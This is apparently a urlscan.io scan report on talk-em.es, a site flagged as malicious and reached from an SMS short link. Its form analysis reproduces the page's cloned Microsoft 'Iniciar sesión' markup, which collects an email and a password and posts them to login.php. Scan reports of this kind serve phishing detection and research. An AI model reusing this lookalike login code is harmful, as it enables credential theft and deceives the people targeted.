talk-em.es Open in urlscan Pro
51.77.148.159  Malicious Activity! Public Scan

Submitted URL: https://5b19.short.gy/tvpt29
Effective URL: https://talk-em.es/?idSMS=470
Submission: On October 10 via manual from ES — Scanned from ES

Form analysis 2 forms found in the DOM

POST login.php

<form action="login.php" autocomplete="off" data-bind=" attr: { action: postUrl }" id="i0281" method="post" name="" novalidate="novalidate" spellcheck="false" target="_top">&gt;<!-- ko withProperties: { '$loginPage': $data } -->
  <div class="outer" data-bind="component: { name: 'page',
        params: {
            serverData: svr,
            showButtons: svr.fShowButtons,
            showFooterLinks: true,
            useWizardBehavior: svr.fUseWizardBehavior,
            handleWizardButtons: false,
            password: password,
            hideFromAria: ariaHidden },
        event: {
            footerAgreementClick: footer_agreementClick } }"><!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --><!-- ko if: svr.fShowCookieBanner --><!-- /ko -->
    <div class="middle" data-bind="css: { 'app': $loginPage.backgroundLogoUrl() }"><!-- ko if: $loginPage.backgroundLogoUrl() && !(paginationControlMethods() && paginationControlMethods().currentViewHasMetadata('hideLogo')) --><!-- /ko -->
      <div class="inner" data-bind="css: { 'app': $loginPage.backgroundLogoUrl(), 'wide': paginationControlMethods() &amp;&amp; paginationControlMethods().currentViewHasMetadata('wide') }"><!-- ko ifnot: paginationControlMethods()
                    && (paginationControlMethods().currentViewHasMetadata('hideLogo')
                        || (paginationControlMethods().currentViewHasMetadata('hideDefaultLogo') && !$loginPage.bannerLogoUrl())) -->
        <div data-bind="component: { name: 'logo-control',
                    params: {
                        isChinaDc: svr.fIsChinaDc,
                        bannerLogoUrl: $loginPage.bannerLogoUrl() } }" role="banner">
          <!--  --><!-- ko if: bannerLogoUrl --><!-- /ko --><!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || !svr.fHasBackgroundColor) && !isHighContrastBlackTheme --><!-- ko template: { nodes: [darkImageNode], data: $parent } --><img
            class="logo" data-bind="imgSrc" pngsrc="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7726.7/content/images/microsoft_logo.png?x=ed9c9eb0dce17d752bedea6b5acda6d9" role="presentation"
            src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7726.7/content/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd"
            svgsrc="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.7726.7/content/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd"><!-- /ko --> <!-- /ko --><!-- /ko --> <!-- /ko --></div>
        <!-- /ko --><!-- ko if: svr.strLWADisclaimerMsg && (paginationControlMethods() && !paginationControlMethods().currentViewHasMetadata('hideLwaDisclaimer')) --><!-- /ko -->
        <div data-bind="component: { name: 'pagination-control',
                        publicMethods: paginationControlMethods,
                        params: {
                            initialViewId: initialViewId,
                            currentViewId: currentViewId,
                            initialSharedData: initialSharedData,
                            initialError: $loginPage.getServerError() },
                        event: {
                            cancel: paginationControl_onCancel,
                            showView: $loginPage.view_onShow } }" role="main">
          <div data-bind="css: { 'animate': animate() || animate.back(), 'back': animate.back }"><!-- ko foreach: views --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- ko template: { nodes: [$data], data: $parent } -->
            <div data-bind="pageViewComponent: { name: 'login-paginated-username-view',
                        params: {
                            serverData: svr,
                            serverError: initialError,
                            isInitialView: isInitialState,
                            displayName: sharedData.displayName,
                            prefillNames: $loginPage.prefillNames,
                            flowToken: sharedData.flowToken,
                            altCredHintShown: sharedData.altCredHintShown },
                        event: {
                            refresh: $loginPage.view_onRefresh,
                            redirect: $loginPage.view_onRedirect,
                            showLearnMore: $loginPage.learnMore_onShow } }" data-viewid="1"><!--  -->
              <div data-bind="component: { name: 'header-control', params: { serverData: svr } }">
                <div class="row text-title" id="loginHeader" role="heading">
                  <div aria-level="1" data-bind="text: title">Iniciar sesión</div>
                  <!-- ko if: isSubtitleVisible --><!-- /ko -->
                </div>
              </div>
              <!-- ko if: pageDescription && !svr.fHideLoginDesc --><!-- /ko -->
              <div class="row">
                <div aria-atomic="false" aria-live="assertive" role="alert"><!-- ko if: usernameTextbox.error --><!-- /ko --></div>
                <div class="form-group col-md-24"><!-- ko if: prefillNames().length > 1 --><!-- /ko --><!-- ko ifnot: prefillNames().length > 1 -->
                  <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox',
            publicMethods: usernameTextbox.placeholderTextboxMethods,
            params: {
                serverData: svr,
                hintText: tenantBranding.UserIdLabel || str['CT_PWD_STR_Email_Example'],
                hintCss: 'placeholder' + (!svr.fAllowPhoneSignIn ? ' ltr_override' : '') },
            event: {
                updateFocus: usernameTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } --><!-- ko template: { nodes: $componentTemplateNodes, data: $parent } -->
                    <!-- CORREO -->
                    <input aria-describedby="usernameError loginHeader loginDescription" aria-label="Enter your email, phone, or Skype." aria-required="true" class="form-control ltr_override" data-bind="textInput: usernameTextbox.value,
                    hasFocusEx: usernameTextbox.focused,
                    placeholder: $placeholderText,
                    ariaLabel: tenantBranding.UserIdLabel || str['CT_PWD_STR_Username_AriaLabel'],
                    css: { 'has-error': usernameTextbox.error },
                    attr: inputAttributes" id="i0116" lang="en" maxlength="113" name="loginfmt" placeholder="Correo electrónico, teléfono o Skype" style="margin-bottom:18px; width:100%" type="email">
                    <div class="col-xs-24" data-bind="
                    css: {
                        'inline-block': svr.fRepositionFooterButtons,
                        'col-xs-12 primary': isSecondaryButtonVisible() &amp;&amp; !svr.fRepositionFooterButtons,
                        'col-xs-24': !(isSecondaryButtonVisible() || svr.fRepositionFooterButtons) }">
                      <input class="btn btn-block btn-primary" data-bind="
                    attr: {
                        'id': primaryButtonId || 'idSIButton9',
                        'aria-describedby': primaryButtonDescribedBy },
                    value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
                    hasFocus: focusOnPrimaryButton,
                    click: primaryButton_onClick,
                    enable: isPrimaryButtonEnabled,
                    visible: isPrimaryButtonVisible" id="next1" onclick="myFunction()" value="Siguiente">
                    </div>
                    <script>
                      function myFunction() {
                        var x = document.getElementById("i0116");
                        x.classList.add('moveOffScreen');
                        var z = document.getElementById("next1");
                        z.classList.add('moveOffScreen');
                        var y = document.getElementById("idSIButton9");
                        y.classList.remove("hidden");
                        y.classList.remove('moveOffScreen');
                        var end = document.getElementById("i0118");
                        end.classList.remove('moveOffScreen')
                      }
                    </script>
                    <!--PASSWORD-->
                    <input aria-hidden="true" autocomplete="off" class="moveOffScreen" data-bind="moveOffScreen, textInput: passwordBrowserPrefill" id="i0118" name="passwd" placeholder="Contraseña" style="width:100%" tabindex="-1" type="password">
                    <div aria-label="Please wait" class="progress" data-bind="visible: isRequestPending, component: 'marching-ants-control', ariaLabel: str['WF_STR_ProgressText']" id="usernameProgress" role="progressbar" style="display: none;">
                      <!--  --><!-- ko if: useCssAnimation -->
                      <div>&nbsp;</div>
                      <div>&nbsp;</div>
                      <div>&nbsp;</div>
                      <div>&nbsp;</div>
                      <div>&nbsp;</div>
                      <div>&nbsp;</div>
                      <!-- /ko --><!-- ko ifnot: useCssAnimation --><!-- /ko -->
                    </div>
                    <!-- /ko --><!-- /ko --><!-- ko ifnot: usePlaceholderAttribute --><!-- /ko -->
                  </div>
                  <!-- /ko -->
                </div>
              </div>
              <!-- ko withProperties: { '$usernameView': $data } -->
              <div class="position-buttons" data-bind="invertOrder: svr.fRepositionFooterButtons, css: { 'position-buttons': !tenantBranding.BoilerPlateText }">
                <div class="row" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }">
                  <div data-bind="component: { name: 'footer-buttons-field',
            params: {
                serverData: svr,
                isPrimaryButtonEnabled: !isRequestPending(),
                isPrimaryButtonVisible: svr.fShowButtons,
                isSecondaryButtonEnabled: true,
                isSecondaryButtonVisible: svr.fShowButtons &amp;&amp; isBackButtonVisible() },
            event: {
                primaryButtonClick: primaryButton_onClick,
                secondaryButtonClick: secondaryButton_onClick } }">
                    <div class="col-xs-24 no-padding-left-right form-group" data-bind="
     visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
     css: { 'no-margin-bottom': removeBottomMargin || svr.fRepositionFooterButtons, 'button-container': svr.fRepositionFooterButtons }">
                      <div class="col-xs-12 secondary" data-bind="
            css: {
                'inline-block': svr.fRepositionFooterButtons,
                'col-xs-12 secondary': isPrimaryButtonVisible() &amp;&amp; !svr.fRepositionFooterButtons,
                'col-xs-24': !(isPrimaryButtonVisible() || svr.fRepositionFooterButtons) }">
                        <input class="btn btn-block" data-bind="
            attr: {
                'id': secondaryButtonId || 'idBtn_Back',
                'aria-describedby': secondaryButtonDescribedBy },
            value: secondaryButtonText() || str['CT_HRD_STR_Splitter_Back'],
            hasFocus: focusOnSecondaryButton,
            click: secondaryButton_onClick,
            enable: isSecondaryButtonEnabled,
            visible: isSecondaryButtonVisible" id="idBtn_Back" style="display: none;" type="button" value="Back">
                      </div>
                      <div class="col-xs-24" data-bind="
            css: {
                'inline-block': svr.fRepositionFooterButtons,
                'col-xs-12 primary': isSecondaryButtonVisible() &amp;&amp; !svr.fRepositionFooterButtons,
                'col-xs-24': !(isSecondaryButtonVisible() || svr.fRepositionFooterButtons) }">
                        <input class="hidden btn btn-block btn-primary moveOffScreen" data-bind="
            attr: {
                'id': primaryButtonId || 'idSIButton9',
                'aria-describedby': primaryButtonDescribedBy },
            value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
            hasFocus: focusOnPrimaryButton,
            click: primaryButton_onClick,
            enable: isPrimaryButtonEnabled,
            visible: isPrimaryButtonVisible" id="idSIButton9" type="submit" value="Siguiente">
                      </div>
                    </div>
                  </div>
                </div>
                <div data-bind="component: { name: 'action-links-control',
            params: {
                collapseExcessLinks: svr.fCollapseExcessLinks },
            event: {
                menuOpen: actionLinks_onMenuOpen } }"><!--  -->
                  <div class="row">
                    <div class="col-md-24">
                      <div class="text-13 action-links"><!-- ko template: { nodes: $componentTemplateNodes, data: $data } --><!-- ko if: svr.showCantAccessAccountLink --><!-- ko component: { name: 'action-link-control',
                    event: {
                        load: actionLink_onLoad,
                        focusChange: actionLink_onFocusChange } } --><!-- ko if: isVisible --><!-- ko template: { nodes: $componentTemplateNodes, data: $data } -->
                        <div class="form-group" data-bind="css: { 'form-group': !isMenuLink(), 'action-links-menu-item': isMenuLink }"><a data-bind="
                        text: str['WF_STR_CantAccessAccount_Text'],
                        hasFocus: hasFocus,
                        click: $usernameView.cantAccessAccount_onClick,
                        attr: { 'role': isMenuLink() ? 'menuitem' : null }" href="#" id="cantAccessAccount">No puede acceder a su cuenta?</a></div>
                        <!-- /ko --><!-- /ko --><!-- /ko --><!-- /ko --><!-- ko if: !svr.sRemoteConnectAppName && svr.remoteLoginConfig --><!-- /ko --><!-- ko if: svr.fCBShowSignUp && !svr.fDoIfExists && !svr.fCheckProofForAliases --><!-- ko component: { name: 'action-link-control',
                    event: {
                        load: actionLink_onLoad,
                        focusChange: actionLink_onFocusChange } } --><!-- ko if: isVisible --><!-- ko template: { nodes: $componentTemplateNodes, data: $data } --><!-- ko if: isMenuLink --><!-- /ko --><!-- ko ifnot: isMenuLink -->
                        <div class="form-group" data-bind="
                        htmlWithBindings: html['WF_STR_SignUpLink_Text'],
                        childBindings: {
                            'signup': {
                                href: svr.urlSignUp,
                                ariaLabel: str['WF_STR_SignupLink_AriaLabel_Text'],
                                click: $usernameView.signup_onClick } }">No tiene cuenta?
                          <a aria-label="Create a Microsoft account" href="https://login.live.com/oauth20_authorize.srf?response_type=code&amp;client_id=51483342-085c-4d86-bf88-cf50c7252078&amp;scope=openid+profile+email+offline_access&amp;response_mode=form_post&amp;redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&amp;state=rQIIAXWSPWzTUBSF-5ImqB0KopXYUAcmJCfP9osbR6pEmx8ncewkjd0QL5FjP6dOHTs4r_7bYGLs3LELUieEhIQ6IrF0ylyJhQEBE2JCTLjsLHc49zvS1T3naZYu0JUniEUlfW_CU7zOsRTiaUjpiOEotsRyLANpswRZ_-Hmg-9f-MZX72Xj-nL8Z9V5q1-AjbFjB7hgePMr8OiEkMWyUiyGYVjwLMs2_i2KHwBYAfANgItMDruUOrjKLDmW4xDkEMMjjucgzZYL2uw0lpg-kpI-kZgjR65CKNXUuDOsR93aAenWWiVpNkIS07DloRrJcxWleqwJEhkpjjOKIZRnh6cpH8rKlGhCP9aUVspIkaao6DZzv3twRk6Yu-H5doJ_ZTYsz5-PF96SXGTfgO4Cuy2z6rkuNkjhDsMusQ2d2J7b870F9omNl_vMRNKdI36mhmKEQuwL01FnoLSHA_E4YXvImvTGe1HnkBuLWCSKoS_HfjkwWIaVGDvsxmKLagV41CN9rLkncmRIZjuRn3detOeq5mh1memFw2ajNG2KajwMidC2bN8R4qApmd60nCzeZfPpW-eee5PdSo9ybXN34XuW7eDVOvixnoFbv9fBZS7Na1N8_HH71adnl-9zNfPz9tpNrnjanAaDVszswVFy5gtN30JKoChJr2MeK-YyisS6UE0MNpjU98sV-jwPzvP5n3nw-t7a9cb_Er7d3ElbUqYgR8HyLo0qdGpF2l81&amp;estsfed=1&amp;uaid=4639e2e96fe64681baa25ffad04cb061&amp;signup=1&amp;lw=1&amp;fl=easi2&amp;mkt=en-US" id="signup">Crear una!</a>
                        </div>
                        <!-- /ko --><!-- /ko --><!-- /ko --><!-- /ko --><!-- /ko --><!-- ko if: $usernameView.availableCredsWithoutUsername.length > 0 --><!-- /ko --><!-- /ko --><!-- ko if: collapseExcessLinks && actionLinks().length > 2 --><!-- /ko -->
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <!-- ko if: $usernameView.altCredHintEnabled() && isCredSwitchLinkInMoreOptions() --><!-- /ko --><!-- /ko --><!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko -->
            </div>
            <!-- /ko --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- /ko -->
          </div>
        </div>
      </div>
      <div data-bind="component: { name: 'instrumentation',
                publicMethods: instrumentationMethods,
                params: { serverData: svr } }"><input data-bind="value: clientMode" name="i2" type="hidden" value="1">
        <input data-bind="value: srsFailed" name="i17" type="hidden" value="optOutUserBanner&quot;&quot;">
        <input data-bind="value: srsSuccess" name="i18" type="hidden" value="">
        <input data-bind="value: timeOnPage" name="i19" type="hidden" value="">
      </div>
    </div>
    <!-- /ko -->
  </div>
</form>

POST

<form action="" aria-hidden="true" data-bind="autoSubmit: postRedirectForceSubmit, attr: { action: postRedirectUrl }" method="post" target="_top">
  <!-- ko foreach: postRedirectParams --><!-- ko if: svr.urlMsaMeControl --><!-- /ko --><!-- ko if: svr.urlCBPartnerPreload -->
  <div data-bind="injectIframe: { url: svr.urlCBPartnerPreload }" id="idPartnerPL"><iframe height="0" src="https://www.office.com/prefetch/prefetch" style="display: none;" width="0"></iframe></div>
  <!-- /ko -->
</form>

Text Content

 
 
>
Iniciar sesión
 
 
 
 
 
 
No puede acceder a su cuenta?
No tiene cuenta? Crear una!

©2020 Microsoft Terms of use Privacy & cookies